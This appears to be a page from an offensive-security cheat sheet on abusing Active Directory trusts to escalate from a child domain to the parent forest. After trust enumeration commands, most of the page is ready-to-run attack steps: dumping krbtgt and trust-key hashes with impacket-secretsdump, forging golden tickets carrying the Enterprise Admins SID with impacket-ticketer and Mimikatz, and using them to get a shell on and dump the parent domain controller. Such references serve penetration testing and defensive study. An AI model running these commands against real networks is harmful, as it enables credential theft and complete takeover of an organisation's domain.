Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Enumerate Trusts

PowerShell

Get-ADTrust -Filter *
nltest /domain_trusts
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()

PowerView

Get-DomainTrust
Get-DomainTrust -Domain parent.domain.local

BloodHound

Map → Domain Trusts view.

Trust Types

TypeDirectionDescription
Parent-ChildBidirectionalAutomatic between parent/child domains
Tree-RootBidirectionalBetween trees in same forest
ExternalOne/BiBetween domains in different forests
ForestOne/BiBetween forest root domains

Parent-Child — Escalation via Golden Ticket

Child domain → parent domain via SID History in golden ticket.

Get krbtgt from Child

impacket-secretsdump CHILD/admin:pass@CHILD_DC -just-dc-user krbtgt

Get Parent Domain SID

impacket-lookupsid CHILD/admin:pass@PARENT_DC

Forge Inter-Realm TGT

impacket-ticketer -nthash CHILD_KRBTGT_HASH -domain-sid CHILD_SID -domain child.domain.local -extra-sid S-1-5-21-PARENT-SID-519 administrator
-519 = Enterprise Admins.

Use

export KRB5CCNAME=administrator.ccache
impacket-psexec child.domain.local/administrator@PARENT_DC -k -no-pass
impacket-secretsdump child.domain.local/administrator@PARENT_DC -k -no-pass

Mimikatz

kerberos::golden /user:Administrator /domain:child.domain.local /sid:CHILD_SID /krbtgt:CHILD_KRBTGT /sids:S-1-5-21-PARENT-SID-519 /ptt

Trust Key Attack

Use inter-realm trust key instead of krbtgt.

Get Trust Key

impacket-secretsdump CHILD/admin:pass@CHILD_DC -just-dc-user 'PARENT$'

Forge

impacket-ticketer -nthash TRUST_KEY -domain-sid CHILD_SID -domain child.domain.local -extra-sid S-1-5-21-PARENT-SID-519 -spn krbtgt/PARENT.DOMAIN.LOCAL administrator

SID Filtering

  • Intra-forest trusts: SID filtering not applied (by default)
  • External/forest trusts: SID filtering applied (blocks SID history)
  • Selective authentication: limits which users can auth across trust

Quick Reference

TaskCommand
Enum trustsGet-ADTrust -Filter *
Child → ParentGolden ticket with -extra-sid PARENT-519
Trust keysecretsdump -just-dc-user 'PARENT$'
SID filteringBlocks SID history on external trusts